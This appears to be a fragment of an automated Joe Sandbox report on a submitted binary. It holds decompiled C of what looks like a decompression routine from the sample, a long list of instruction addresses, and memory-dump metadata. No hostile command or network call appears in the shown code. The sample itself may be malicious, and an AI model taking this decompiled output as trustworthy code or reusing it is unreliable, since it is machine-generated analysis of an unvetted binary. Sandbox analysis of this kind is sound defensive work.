                                                                                            														__eflags =  *_t338;
                                                                                            														goto L102;
                                                                                            													} else {
                                                                                            														goto L99;
                                                                                            													}
                                                                                            												}
                                                                                            												__edx =  *(__ebp - 4);
                                                                                            												__eax = __eax - __ebx;
                                                                                            												 *(__ebp - 0x40) = __ecx;
                                                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            												goto L108;
                                                                                            											case 0x1a:
                                                                                            												L56:
                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0x1a;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x68);
                                                                                            												__al =  *(__ebp - 0x5c);
                                                                                            												__edx =  *(__ebp - 8);
                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            												 *( *(__ebp - 0x68)) = __al;
                                                                                            												__ecx =  *(__ebp - 0x14);
                                                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            												__eax = __ecx + 1;
                                                                                            												__edx = 0;
                                                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                            												__edx = _t192;
                                                                                            												goto L79;
                                                                                            											case 0x1b:
                                                                                            												L75:
                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0x1b;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__edx =  *(__ebp - 8);
                                                                                            												__cl =  *(__eax + __edx);
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                            												 *(__eax + __edx) = __cl;
                                                                                            												__eax = __eax + 1;
                                                                                            												__edx = 0;
                                                                                            												_t274 = __eax %  *(__ebp - 0x74);
                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                            												__edx = _t274;
                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            												_t283 = __ebp - 0x64;
                                                                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                            												__eflags =  *_t283;
                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                            												L79:
                                                                                            												 *(__ebp - 0x14) = __edx;
                                                                                            												goto L80;
                                                                                            											case 0x1c:
                                                                                            												while(1) {
                                                                                            													L123:
                                                                                            													__eflags =  *(__ebp - 0x64);
                                                                                            													if( *(__ebp - 0x64) == 0) {
                                                                                            														break;
                                                                                            													}
                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                            														__eflags = __eax;
                                                                                            													}
                                                                                            													__edx =  *(__ebp - 8);
                                                                                            													__cl =  *(__eax + __edx);
                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                            													 *(__ebp - 0x5c) = __cl;
                                                                                            													 *(__eax + __edx) = __cl;
                                                                                            													__eax = __eax + 1;
                                                                                            													__edx = 0;
                                                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                                                            													__edx = _t414;
                                                                                            													__eax =  *(__ebp - 0x68);
                                                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            													__eflags =  *(__ebp - 0x30);
                                                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                                                            													 *(__ebp - 0x14) = _t414;
                                                                                            													if( *(__ebp - 0x30) > 0) {
                                                                                            														continue;
                                                                                            													} else {
                                                                                            														L80:
                                                                                            														 *(__ebp - 0x88) = 2;
                                                                                            														goto L1;
                                                                                            													}
                                                                                            												}
                                                                                            												 *(__ebp - 0x88) = 0x1c;
                                                                                            												goto L170;
                                                                                            										}
                                                                                            									}
                                                                                            									L171:
                                                                                            									_t544 = _t543 | 0xffffffff;
                                                                                            									goto L172;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					goto L1;
                                                                                            				}
                                                                                            			}














                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631d
                                                                                            0x00406323
                                                                                            0x00406335
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x004062f1
                                                                                            0x004062f7
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x004068d2
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x004068ee
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x0040673a
                                                                                            0x00406734
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00406734
                                                                                            0x004066bb
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004062ef

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
